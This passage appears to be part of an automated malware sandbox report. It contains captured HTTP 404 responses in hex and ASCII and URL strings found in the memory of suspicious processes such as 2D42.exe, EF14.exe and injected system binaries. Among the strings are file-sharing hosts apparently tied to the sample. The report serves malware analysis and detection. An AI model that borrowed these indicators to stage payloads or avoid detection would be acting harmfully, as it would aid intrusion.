Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:43:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:44:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:45:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:46:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr String found in binary or memory: http://.css
Source: EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: EF14.exe, 00000009.00000000.2414457891.00007FF71C0D4000.00000008.00000001.01000000.00000007.sdmp, EF14.exe, 00000009.00000002.2568996472.00007FF71C0E3000.00000008.00000001.01000000.00000007.sdmp, EF14.exe.1.dr String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 0000000E.00000002.2701783399.000001B9C8FCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: BitLockerToGo.exe, 00000010.00000003.2610145522.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2688279158.0000000003130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E0026A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rentry.co
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1697734591.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1698965535.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1698588351.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1700184232.0000000009B60000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 2D42.exe, 0000000A.00000002.2754935748.000001E002291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B8F61000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000002.4110836467.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9BA6FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://store4.gofile.io
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: 2D42.exe, 0000000A.00000002.2799678029.000001E01BAF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
